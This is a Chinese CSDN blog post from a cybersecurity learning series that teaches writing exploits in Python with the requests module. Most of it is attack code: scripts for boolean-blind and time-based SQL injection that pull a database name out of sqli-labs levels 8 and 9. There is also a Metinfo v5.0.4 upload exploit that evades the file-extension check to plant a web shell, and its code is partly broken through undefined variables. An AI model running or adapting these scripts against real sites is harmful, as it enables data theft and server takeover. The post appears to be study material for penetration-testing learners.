【CyberSecurityLearning 68】python 编写exp

最新推荐文章于 2024-03-21 18:08:12 发布
最新推荐文章于 2024-03-21 18:08:12 发布
阅读量467 收藏 1
点赞数 1
分类专栏: CyberSecurityLearning
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/waffle666/article/details/115719951
版权
本文通过Python脚本展示了布尔盲注和延时注入的实现,以sqli-labs的第八关和第九关为例,同时介绍了如何利用Python进行文件上传操作,以Metinfo v5.0.4为例。文章涵盖了基础的HTTP请求设置、参数传递和利用技巧。
摘要由CSDN通过智能技术生成

目录

python 编写exp

用python脚本实现布尔盲注

用python脚本实现延时注入

文件上传

 

python 编写exp

exp:漏洞利用工具

以Web 漏洞为主

要求:
1、能够看懂别人写的exp,并修改
2、能自己写exp

基础环境:python3

核心模块:requests
requests模块介绍详细请看:https://blog.csdn.net/Waffle666/article/details/115720052

定制头部

重新定义User-Agent 信息

超时

GET 传参

POST 传参

文件上传

cookie 信息

 

用python脚本实现布尔盲注

以sqli-labs第八关为例

import requests
import string
 
url = "http://192.168.3.102:82/Less-8/"
 
normalHtmlLen = len(requests.get(url=url+"?id=1").text)
 
print("The len of HTML: "+str(normalHtmlLen))
 
dbNameLen =0
 
while True:
    dbNameLen_url = url+"?id=1'+and+length(database())="+str(dbNameLen)+"--+"
    #print(dbNameLen_url)
 
    if len(requests.get(dbNameLen_url).text) == normalHtmlLen:
        print("The len of dbNameLen: "+str(dbNameLen))
        break
 
    if dbNameLen == 30:
        print("ERROR!")
        break
 
    dbNameLen +=1
 
dbName=""
 
for i in range(1,9):
    for a in string.ascii_lowercase:
        dbName_url = url+"?id=1'+and+substr(database(),"+str(i)+",1)='"+a+"'--+"
        #print(dbName_url)
        if len(requests.get(dbName_url).text) == normalHtmlLen:
            dbName +=a
            print("The dbName :"+dbName)
            break

用python脚本实现延时注入

以sqli-labs第九关为例

import requests
import string
 
url = "http://192.168.3.102:82/Less-8/"
 
def timeOut(url):
    try:
        res = requests.get(url,timeout=3)
        return res.text
 
    except Exception as e:
        return "timeout"
 
dbNameLen = 0
 
while True:
    dbNameLen +=1
    dbNameLen_url = url+"?id=1'+and+if(length(database())="+str(dbNameLen)+",sleep(5),1) --+"
    #print(dbNameLen_url)
 
    if "timeout" in timeOut(dbNameLen_url):
        print("The Len of dbName: "+str(dbNameLen))
        break;
 
    if dbNameLen == 30:
        print("ERROR!")
        break;
 
dbName = ""
 
for i in range(1,dbNameLen+1):
    for char in string.ascii_lowercase:
        dbName_url = url+"?id=1'+and+if(substr(database(),"+str(i)+",1)='"+char+"',sleep(5),1)--+"
        #print(dbName_url)
 
        if "timeout" in timeOut(dbName_url):
            dbName +=char
            print("The dbName :"+dbName)
            break;

文件上传

以Metinfov5.0.4为例,

import requests
import sys
 
url = sys.argv[1]
 
postUrl = urL+"http://192.168.1.200/metinfov504/metinfov504/admin/include/uploadify.php?metinfo_admin_id=aaa&metinfo_admin_pass=123.com&met_admin_table=met_admin_table%23&type=upfile&met_file_format=jpg|pphphp"
 
upFile = {"FileData":open(path,"rb")}
 
res = requests.post(url=postUrl,files=upFile)
 
print("The Shell path:"+url+res.text[4:])

 

 

 

Wαff1ε
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python实现定制EXP
weixin_51693574的博客
01-31 952
python实现定制EXP 一、POC和EXP 四个常见概念: POC:(Proof of Concept)概念验证,常指一段漏洞证明的代码。 作用:用来证明漏洞存在的(无害的) EXP:(Exploit)利用,指利用系统漏洞进行攻击的动作。 作用:用来利用漏洞的(有害的) Payload:(攻击载荷,指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode:Payload的一种,由于其建立正向/反向shell而得名。 一个形象的比喻: 想象自己是特工,你目标是监控一个重要的
使用python进行sql布尔盲注exp编写
CC210231的博客
04-04 2545
前言: 前面学习并实现了简单的注入exp编写,那是根据注入的payload 匹配 网页内容得到注入数据,像这种exp只能应用于简单的注入,盲注入就要复杂一些,但是原理也是差不多。 exp原理: 我们知道,对于sql布尔盲注,也就是页面只会返回两种状态,一种是注入语句正确执行返回正常页面,一种就是注入语句执行错误返回不正常页面,我们就可以通过返回页面的状态判断我们注入语句是否正确执行,在sql布尔盲注中,我们常通过逐个判断字符来得到最终的信息,源于此,我们就有如下思路了: 返回的页面不同,也就是返回.
Python编写EXP
weixin_41489908的博客
08-10 2343
高考过后,你不用告诉我你考多少分,悲喜之后也不要告诉我你志愿填了哪里,只要告诉我最后去了哪?我坐火车或飞机要多久,在此停留能否蹭口饭吃,一本二本我真的分不清楚,我只知道你是我朋友。。。 ---- 网易云热评 一、环境 1、python3 2、用到的模块requests 二、requests模块应用 1、获取网页的内容 # coding=utf-8 import requests res=requests.get("http://192.168.1.129/html/1.html")..
python学习之phpcms exp编写
cxk
05-28 473
python学习之phpcms exp编写 针对phpcms v9.6 前台注册getshell exp编写,漏洞分析请查看网上分析,不再赘述。 # -*- coding:utf-8 -*- import re import string import requests import random import time def getshell(host): try: ...
061 python实现EXP
鸡蛋炒鸡蛋
04-20 5125
文章目录一:概述二:环境准备三:requests库3.1:发送get请求3.2:相关方法3.3:相关操作3.3.1:定制头部3.3.2:超时3.3.3:GET传参 一:概述 python编写EXP,以web漏洞为主 exp 漏洞利用工具 1、能够看懂别人写的exp,并修改 2、能自己写exp 基础环境python3 核心模块requests 模块说明 requests是使用Apache2 license 许可证的http库 用python编写,比urllib2模块更简洁 requests支持http
pythonexp函数_Python3 exp()函数
weixin_39551103的博客
12-21 562
语法以下是exp()方法的语法:import mathmath.exp( x )注:此函数无法直接访问,所以我们需要导入math模块,然后用数学静态对象调用这个函数。参数x--这是一个数字表达式返回值这个方法返回x的指数幂: ex.示例下面的示例显示exp()方法的使用。#!/usr/bin/python3import math # This will import math ...
python编写EXP/POC速成小记
U_U520的博客
02-22 1971
find() 方法检测字符串中是否包含子字符串 str ,如果指定 beg(开始) 和 end(结束) 范围,则检查是否包含在指定范围内,如果包含子字符串返回开始的索引值,否则返回-1。上述脚本存在误报,就是payload只有一个单引号闭合,没办法检验数字型sql,双引号型,’)型,’))等在payload中多加几个类型,可以直接导入自己的FUZZ字典。漏洞刚被批漏之后,有时候现有的工具里面是没有相应的EXP的,那我们可以根据原理写出对应的EXP代码,验证漏洞是否存在。不然会出现报错不适用。
python编写poc_POC编写基础知识
weixin_29405101的博客
12-23 3364
什么是 PoCPoC(全称: Proof of Concept), 中文译作概念验证。在安全界,你可以理解成为漏洞验证程序,和一些应用程序相比,PoC 是一段不完整的程序,仅仅是为了证明提出者的观点的一段代码什么是 ExpExp(全称: Exploit),中文叫漏洞利用程序。名字上说的已经很清楚了,简单讲,就是一段可以发挥漏洞价值的程序,这话感觉和没说一样。想象一下这样的场景,目标存在一个 SQL...
python编写网络防火墙_firewall防火墙
weixin_39790738的博客
12-19 3144
firewall防火墙1 防火墙简介在基于RHEL7的服务器,提供了一个firewall的动态管理的防火墙,其支持IPv4和IPv6,还支持以太网桥,并有分离运行时间和永久性配置选择。它还具备一个通向服务或者应用程序以直接增加防火墙规则的接口。2 简单介绍firewall的配置文件:/etc/lib/firewalld/和/etc/firewalld/下的XML文件。配置firewall可以直接编...
python做一个木马_Python编写简易木马程序
weixin_34405261的博客
01-30 6274
light · 2015/01/26 10:070x00 准备文章内容仅供学习研究、切勿用于非法用途!这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Sublime text2 +JEDI(python自动补全插件)来撸代码,安装配置JEDI插件可以参照这里: http://drops.wooyun.org/tips/4413首先准备好我们需要的依赖库,pytho...
python学习之dedecms exp编写
cxk
05-24 728
python学习之dedecms exp编写 针对织梦5.7 sp1远程文件包含getshell exp编写,漏洞分析请查看网上分析,不再赘述。 exp # -*- coding:utf-8 -*- import requests import time def dada(url): url_index=url+"/install/index.php" headers = {"...
python学习之ecshop exp编写
cxk
06-04 504
python学习之ecshop exp编写 针对ecshop 2.x,漏洞分析请查看网上分析,不再赘述。 # -*- coding:utf-8 -*- import requests import time def ecshop(url): time.sleep(5) url_exp=url+"/user.php" a = "554fcae493e564ee0dc7...
exp编写
最新发布
qq_74378387的博客
03-21 345
在https://www.exploit-db.com/ 漏洞库里面 每天都可以很多新的漏洞发布。可是新的漏洞很多漏洞发布者 ,都是只给代码漏洞部分,更多的是没有详细的分析。更别说是漏洞利用程序了。掌握漏洞编写的技能,随心所欲地编写漏洞利用程序,不仅能简化测试过程,而且可以让漏洞程序多种多样满足我们的需要。一般的们多数接触的是WEB安全漏洞 (Web Application Exploits)这类较多。一般只需理解和掌握http协议即可。简单的html基础也可以编写EXP了。
Python灰帽编程——定制EXP武器库
来日可期的博客
09-22 1324
POC:(Proof of Concept)概念验证,常指一段漏洞证明的代码。 作用:用来证明漏洞存在的(无害的)EXP:(Exploit)利用,指利用系统漏洞进行攻击的动作。 作用:用来利用漏洞的(有害的)Payload:(攻击载荷,指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode:利用漏洞时所执行的代码。Payload的一种,由于其建立正向/反向shell而得名。
Python----POC到EXP(requests模块、python脚本实现布尔盲注、延时注入)
Pluto.的博客
12-27 2745
文章目录Python一、编写EXP1. requests模块- 概述- 支持HTTP的方法- requests使用HTTP方法- 参数- 对象对应的方法2. 快速开始3. 相关操作- 定制头部- 超时- GET传参- POST传参- 上传文件- 重定向- cookie4. py脚本实现布尔盲注5. py脚本实现延时注入- sys.argv[ ] Python 一、编写EXP EXP是漏洞利用工具; 基础环境Python3,核心模块requests。 1. requests模块 - 概述 requests
exp编写笔记
qq_42863961的博客
08-19 338
能帮到你的话,就给个赞吧 ???? python2 -c “print ‘A’*44 + ‘\x59\x86\x04\x08’” | ./ret2win32:python2 -c 是执行代码。| :管道
EXP脚本编写
m0_62207482的博客
01-27 895
EXP脚本的编写与POC脚本编写一样,只需要修改_attack部分,替换成漏洞 利用的脚本即可。Flask漏洞主要利用了框架的特点,在Flask中,“ {{}}” 中的内容会被当作代码 执行,相应的防御中就需要对“ {{}}”进行过滤,禁止此符号传入参数中。利用Pocsuite 3开源框架,可以接收用户输入的命令行参数,对目标系统进行 半交互控制,具体实现过程如下所示。首先,根据官方文档说明,编写一个接收自定义命令的函数,将接收到的命 令赋值给command参数。,最终效果如 图3-5所示。
CyberSecurityLearning 附】python3-requests模块
_Co1a
04-15 418
目录 requests模块 模块说明 速查 HTTP方法 requests 模块中的http方法 参数 对象方法 模块入门 导入模块 发送简洁请求 相关方法 相关操作 定制头部 超时 GET 传参 POST 传参 上传文件 重定向 关于cookies requests模块 模块说明 requests是使用Apache2 licensed许可证的HTTP库。用python编写。 比urllib2模块更简洁。 Request支持HTTP连接保持和连接池,支持..
python exp()
newfayi的博客
11-18 1141
转自 http://www.runoob.com/python/func-number-exp.html 描述 exp() 方法返回x的指数,ex。 语法 以下是 exp() 方法的语法: import math math.exp( x ) 注意:exp()是不能直接访问的,需要导入 math 模块,通过静态对象调用该方法。 参数
使用Python编写Vim插件完全指南
"如何使用Python编写vim插件" 在深入探讨如何使用Python编写vim插件之前,我们先要了解vim的基本概念。Vim是一款强大的文本编辑器,它以其高度可定制性和丰富的扩展性著称。VimL是vim的内置脚本语言,用于编写简单...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值